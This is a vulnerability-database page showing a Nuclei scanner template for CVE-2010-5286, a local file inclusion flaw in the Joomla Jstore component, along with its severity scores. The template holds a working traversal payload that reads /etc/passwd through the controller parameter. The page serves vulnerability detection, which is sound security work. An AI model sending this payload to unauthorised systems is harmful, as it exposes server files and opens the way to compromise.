Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-5286
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component Jstore - 'Controller' Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
5
joomla
component
jstore
controller
local file inclusion
arbitrary file inclusion
remote code execution
cve-2010-5286
exploit-db
packetstorm
joobi

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

7.1

Confidence

High

EPSS

0.01

Percentile

84.1%

A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-5286

info:
  name: Joomla! Component Jstore - 'Controller' Local File Inclusion
  author: daffainfo
  severity: critical
  description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Arbitrary file inclusion leading to remote code execution
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/34837
    - https://nvd.nist.gov/vuln/detail/CVE-2010-5286
    - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2010-5286
    cwe-id: CWE-22
    epss-score: 0.08973
    epss-percentile: 0.94583
    cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joobi
    product: com_jstore
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bc54ac25bae7f3d0876f30aa9fb8800f5d6c36ad89fbdc467b19abe6adce7ee102210097102e3aa4222ba9586f8537a69a955c66fa6e99b7e017c1fab3fb3287ccedc3:922c64590222798bb761d5b6d8e72950

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

7.1

Confidence

High

EPSS

0.01

Percentile

84.1%

Related for NUCLEI:CVE-2010-5286